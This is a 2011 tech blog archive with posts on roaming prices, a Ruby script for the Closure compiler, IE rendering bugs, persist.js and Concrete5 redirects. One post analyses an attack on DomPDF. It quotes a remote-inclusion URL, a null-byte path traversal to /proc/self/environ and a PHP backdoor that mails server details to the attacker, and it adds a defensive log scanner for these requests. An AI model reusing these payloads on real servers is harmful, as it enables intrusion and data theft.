Archive for the ‘tech’ Category

It is still not enough

Sunday, November 6th, 2011

IOTs = Inter-Operator Tariffs are predicted to fall to €0.08 per MB of data roaming in 2012. (source – data for Europe).

For 1 GB of data this reads as an end-consumer price of €119. Think of e.g. watching movies or HD television, or corporate data asset transfers … this can be used up in less than a day. For instance, watching iPlayer (streaming TV for Brits) in high quality uses up 320 MB for one hour. (source)

I calculated the price as follows:

€ 0.08 / MB x 1000 MB x 1.25 x 1.19 = € 119

It includes a proposed 25 % home operator surcharge on the wholesale IOT price (source – Australian data), and an additional 19 % VAT added on top of it all.

We need other solutions, and we need them fast. For comparison: Fonic of Germany gives you 5 GB data transfer for €25.

Compiling with ruby and closure

Tuesday, November 1st, 2011

Here's some code to call the Closure compiler (whose jar is renamed to closure.jar) from a Ruby script:

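require 'open3'

# Optimize every .js file directly inside `target` (not recursive), in place.
def optimize_js(target)
  filecounter = 0
  Dir.glob(File.join(target, '*.js')).each do |f|
    puts "Processing #{f}"
    # Pass the arguments as a list so the file name never goes through a shell
    my_js, status = Open3.capture2('java', '-jar', 'closure.jar',
                                   '--charset', 'iso-8859-1', '--js', f)
    # Keep the original file if the compiler failed
    next unless status.success?
    File.open(f, 'w') { |con_file| con_file.write(my_js) }
    filecounter += 1
  end

  puts "\n\t # JS Optimization: Done. Modified #{filecounter} files."
end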

This code will overwrite the js files, so please be sure to operate on a copy of your files!

It is a function which takes a directory (target) and processes all files with the ending .js, replacing them in place with the optimized JS output. You need to put closure.jar in the same directory as the ruby script.

Note that I also use the --charset iso-8859-1 option. This option ensures that closure reads the file in that ISO charset instead of assuming UTF-8. The UTF-8 default will work OK until you have special characters from foreign languages, e.g. ä ö ü ß or á or whatever. Think Spanish, French, German.

Warning about the Kabel Internet FritzBox 6360

Saturday, October 22nd, 2011

The box is crippled and under the control of Kabel Deutschland:

  • Firmware updates are done by Kabel Deutschland, not by the user
  • You cannot enter other Internet telephony providers. This is allegedly partly enforced with DNS blocks

This is an extremely sad testimony, both for Kabel Deutschland and for the company AVM, whose hardware is otherwise a model of openness towards customers.

There is a workaround (Google is your friend), but I find it NOT OK that one has to resort to workarounds. Even if de jure you have rented the box, de facto it should be of use to you and technically offer its full capabilities. Without artificial crippling, grr!

And if the other providers really are blocked, then I will have to consider withdrawing from the connection again.

Administrating Zimbra

Thursday, October 13th, 2011

Here are some pointers to useful tools and some solutions.

Good Geo IP location tool:

Reading large Zimbra log files:

/var/log/auth.log swamped by error messages (mail sudo: PAM adding faulty module: /lib/security/pam_smbpass.so):

This is an Ubuntu / Debian bug. Please follow this solution:

Zimbra admin guide (PDF):

Weird IE 7 bug

Saturday, October 8th, 2011

I have an IFRAME in my page which is positioned absolutely, and shown and hidden for overlaying additional information.

When testing with IE 7 in a virtual machine, this IFRAME crashed the browser (processor load up to 100% for IE, no progress) for one specific page; others were fine.

I suspect that if the content in the IFRAME is going to be rendered in standards mode, this bug occurs. I force standards mode in my HTML documents by the appropriate <DOCTYPE> and a META Tag.

It is not present in either IE 6 or IE 9, so you might want to check for v 7 specifically and display a new window as workaround.

Sometimes programming for the web feels like herding a lot of cats, all meowing and running in different directions. Fix one thing, break another …

Opera and Chrome blocking JSON requests in local mode

Friday, October 7th, 2011

If you browse a web page from your hard drive (that is, not hosted on a local Apache and called via localhost, but opened using file://) you might notice that your $.getJSON requests won't work -> your application will break.

This is by design, and a security measure.

If you only load static information via JSON (which you probably would in such an environment, right?), one (crutch of a) solution would be to include the information as a new .js file (include it in your HTML head) which sets up a variable containing this information. A simple assignment from this variable will then replace your $.getJSON call.

persist.js does not work with Firefox offline

Thursday, October 6th, 2011

Yes, it seems to be by design (of Firefox' implementation of localstorage). It does not work for file:// URLs.

Persist.js currently has no workaround, the contents of your database will be cleared …

In order for Firefox to work offline, you have to remove the "localstorage" type manually, like this:

Persist.remove('localstorage');

Persist.js will issue a warning that globalStorage can't be used, and fall back to cookie storage, which has size limitations. On a side note, removing both localstorage and cookie storage will fall back to Flash. Flash will probably work, but it pops up a message which your users might find bewildering, and click away – viz:

[Image: persist]

What is left after removing localstorage, cookie and flash?

Nothing (as Gears is not available).

Cookie's the way to go – you will have to live with the size restraints!

The way to check for larger strings than the storage allows does not seem to work for me. I used:

Persist.size != -1 && Persist.size < JSON.stringify(tmp_answer_db).length

One workaround for larger data might be to use a JS compressor to fit all into the cookie. Or save less – reduce to the essential! Don't use JSON, use your own notation. Even JSON is too large for the cookie.

Update: Detecting firefox in a local file:// environment and removing localstorage

// Detect Firefox. If it's the Fox AND running locally, remove localstorage
if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && window.location.protocol == 'file:') {
    Persist.remove('localstorage');
}

Attack on DomPDF

Sunday, October 2nd, 2011

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file; its danger probably lies in being used with the right application. Here are the contents of vero.txt:

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("[...]"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; }
$visitor = $_SERVER["REMOTE_ADDR"];
$float = "From : vurl info <full@info.com>";
$aran = exec('uname -a;');
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode;
mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

For the exploit to work, it actually has to be executed by DomPDF, i.e. DomPDF has to execute PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com.

Additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your php.ini.
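A log check for the two request shapes quoted above (a remote URL in input_file, and a ../ traversal ending in %00), as an added example that is not part of the original post. The log lines are constructed around the two request paths from the post; the function names and reason labels are illustrative assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the two request paths quoted in the post plus one
# benign request, wrapped in made-up common-log-format lines.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Oct/2011:10:00:01 +0200] "GET //dompdf.php?input_file=http://www.fridela.com/slide/vero.txt? HTTP/1.1" 200 512
192.0.2.11 - - [02/Oct/2011:10:00:05 +0200] "GET /max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 128
198.51.100.7 - - [02/Oct/2011:10:01:00 +0200] "GET /dompdf.php?input_file=invoice.html HTTP/1.1" 200 20480
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.I)  # http:, ftp:, php:, data: ...


def classify_input_file(value):
    """Return the reasons a decoded input_file value looks hostile."""
    reasons = []
    if SCHEME_RE.match(value):
        reasons.append("remote-or-wrapper-url")
    if "\x00" in value:
        reasons.append("null-byte")
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("path-traversal")
    if value.startswith("/"):
        reasons.append("absolute-path")
    return reasons


def scan(log_text):
    """Return (client_ip, reasons) for each suspicious dompdf.php request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or "dompdf.php" not in m.group(1):
            continue
        # parse_qs percent-decodes once, so %00 turns into a NUL character
        query = m.group(1).partition("?")[2]
        for value in parse_qs(query, keep_blank_values=True).get("input_file", []):
            reasons = classify_input_file(value)
            if reasons:
                findings.append((line.split()[0], reasons))
    return findings


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The same classification can be used as an allow-list check in front of dompdf.php: reject any input_file value for which `classify_input_file` returns a non-empty list.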

Internet Explorer, position fixed and strict mode

Wednesday, September 14th, 2011

You want to use fixed positioning with CSS

If you want to make use of the simple CSS position:fixed; to display an element static to the viewport, you will run into problems with Internet Explorer.

position:fixed is only supported since Internet Explorer 7

I tested this solution with IE 7.0.5730.13 on Windows XP. IE 6 does not support fixed positioning.

You need to enforce strict mode

Internet Explorer will default to "quirky rendering mode", if you don't add special tags to your HTML document:

<!DOCTYPE html>
<HTML>
<HEAD>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Progress Test</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<script language="JavaScript" src="../head.min.js"></script>
[...]

Both are essential! If you try IE 9 on the page without having added the meta tag X-UA-Compatible, it will render the page in quirky mode. And in quirky mode, it will ignore your position:fixed, and render your element where you have put it in the flow of the document.

Please note: I have read that this meta tag actually is not valid for this DOCTYPE.

It still does not work? I am testing with local documents!

Internet Explorer also takes into account where the element is being served from. This solution will work if you upload your test documents to a server and access them over the Internet. It will not work (see note below) for local files, even if you use a local webserver to serve up the files (e.g. XAMPP). Internet Explorer will render your document in quirky mode in this case.

Note: actually it does work offline (opening a document from the hard drive) in Internet Explorer 9 after fiddling somewhat with the document. I removed an IE compatibility script (not shown above), which I had included from Google previously. Check if you have one of those, and remove it!

Redirection with Concrete 5

Wednesday, September 14th, 2011

URL Shortening is all the rage now. Sometimes you want to give people ridiculously long URLs, which might also be subject to change.

So you want to do it with C5, don't you?

Great, you think – there's the "add external link" menu option in Concrete's sitemap. Unfortunately it does not work the way you expect it to – it just adds the link to the Navigation, but no page alias to point to the external page (e.g. http://www.synapse-redaktion.de/FaceBook won't work after adding a "FaceBook" external link).

What to do to solve this dilemma?

My suggestion is to use both: add a (hidden) page "FaceBook" which does header JavaScript forwarding to the other page, so you can give out the links to the people, and a "real external link" so you don't have to rely on JavaScript for most of your visitors.

The SiteMap will look like this:

[Image: sitemap]

Adding custom attributes: (Header Extra Content, Exclude from Page List, Exclude from Nav)

[Image: header extra content]

The page's setup:

[Image: setup]

The script is easy:

<script type="text/javascript">
<!--
window.location = "http://www.surfnext.com";
//-->
</script>

with surfnext.com being the URL you are forwarding to.

If you have the time, you might want to add a static link or icon to the page (/*comment*/ the window.location = … part to be able to edit the page!) in case some person has their JavaScript turned off.